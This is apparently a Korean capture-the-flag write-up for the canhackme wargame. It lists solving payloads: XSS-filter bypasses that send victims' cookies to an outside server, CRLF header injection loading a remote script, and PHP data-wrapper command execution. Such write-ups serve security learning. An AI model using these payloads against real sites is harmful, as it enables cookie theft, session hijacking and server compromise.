canhackme
Misc 문제 1, Server-Side 문제 4, XSS 문제 10
XSS 문제 팁
문제 안에는 아무런 힌트가 존재하지 않고 어떤 류의 문제인지는 문제 설명페이지 오른쪽 하단 해쉬태그 형식으로만 알려준다. 문제의 목적이 대체로 불친절하므로 삽질했던 부분에 대해 적어둔다.
1. 자신의 서버로 이동하는 XSS 스크립트가 담긴 url을 tester페이지에 요청하면 쿠키를 확인 가능하다.
2. tester페이지가 사용하는 Google Chrome 68.0.3440.75. 에는 Chrome Auditor 라는 XSS 필터링이 존재하므로 XSS 필터링 우회가 반드시 필요하다.
문제 Payload
JSON
https://json.canhack.me/?%3Cscript%3E=;document.location=%27https://limelee.xyz?%27%2bdocument.cookie;%3C/script%3Ebabyphp
https://babyphp.canhack.me/?p=data:,%3C?=`ls`;%23
https://babyphp.canhack.me/?p=data:,%3C?=`cat%20a*`;%23bbcode
https://bbcode.canhack.me/?code=[email][img][url]%20onerror=a=String.fromCharCode(104)%2bString.fromCharCode(116)%2bString.fromCharCode(116)%2bString.fromCharCode(112)%2bString.fromCharCode(115)%2bString.fromCharCode(58)%2bString.fromCharCode(47)%2bString.fromCharCode(47)%2bString.fromCharCode(108)%2bString.fromCharCode(105)%2bString.fromCharCode(109)%2bString.fromCharCode(101)%2bString.fromCharCode(108)%2bString.fromCharCode(101)%2bString.fromCharCode(101)%2bString.fromCharCode(46)%2bString.fromCharCode(120)%2bString.fromCharCode(121)%2bString.fromCharCode(122)%2bString.fromCharCode(63);location.href=a%2bdocument.cookie;//%20[/url][/img]%20[/email]Caesar
https://caesar.canhack.me/?text=%3Cpzofmq%20poz=eqqmp://zxbpxo.zxkexzh.jb/?qbuq=ilzxqflk.eobc=%22eqqmp://ifjbibb.uvw/?%22%2yalzrjbkq.zllhfb%26hbv=0%20%3E%3C/pzofmq%3E&key=3Uppercase2
https://uppercase2.canhack.me/?text=<ſcript%20src=https://lowercase.canhack.me/?%26%23116%26%23101%26%23120%26%23116=location.href="https://limelee.xyz/?"%252bdocument.cookie></ſcript>Lowercase
https://lowercase.canhack.me/?text=<scRipt%20sRC=HTTp://lowercase.canhack.me/?text=location.href=%27httP://limelee.xyz/?%27%252bdocument.cookie%20></SCRIPT>redirect
https://redirect.canhack.me/?url=</script><svg><script>a=String.fromCharCode(104)%2bString.fromCharCode(116)%2bString.fromCharCode(116)%2bString.fromCharCode(112)%2bString.fromCharCode(115)%2bString.fromCharCode(58)%2bString.fromCharCode(47)%2bString.fromCharCode(47)%2bString.fromCharCode(108)%2bString.fromCharCode(105)%2bString.fromCharCode(109)%2bString.fromCharCode(101)%2bString.fromCharCode(108)%2bString.fromCharCode(101)%2bString.fromCharCode(101)%2bString.fromCharCode(46)%2bString.fromCharCode(120)%2bString.fromCharCode(121)%2bString.fromCharCode(122)%2bString.fromCharCode(63);location.href=a%2bdocument.cookie;//redirect2
https://redirect2.canhack.me/?url=%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Cscript/src=http://limelee.xyz/test.js%3E%3C/script%3E
test.js
location.href='https://limelee.xyz'+document.cookiecat
https://cat.canhack.me/?file=index.php
https://cat.canhack.me/?file=fl$@ag-f72a161d445915d2bdcdc820c4143353.phpredirect3
https://redirect3.canhack.me/?url=//%27);-%0d%0a</script><script%20src=http://limelee.xyz/test.js>%0d%0a//
test.js
location.href='https://limelee.xyz'+document.cookie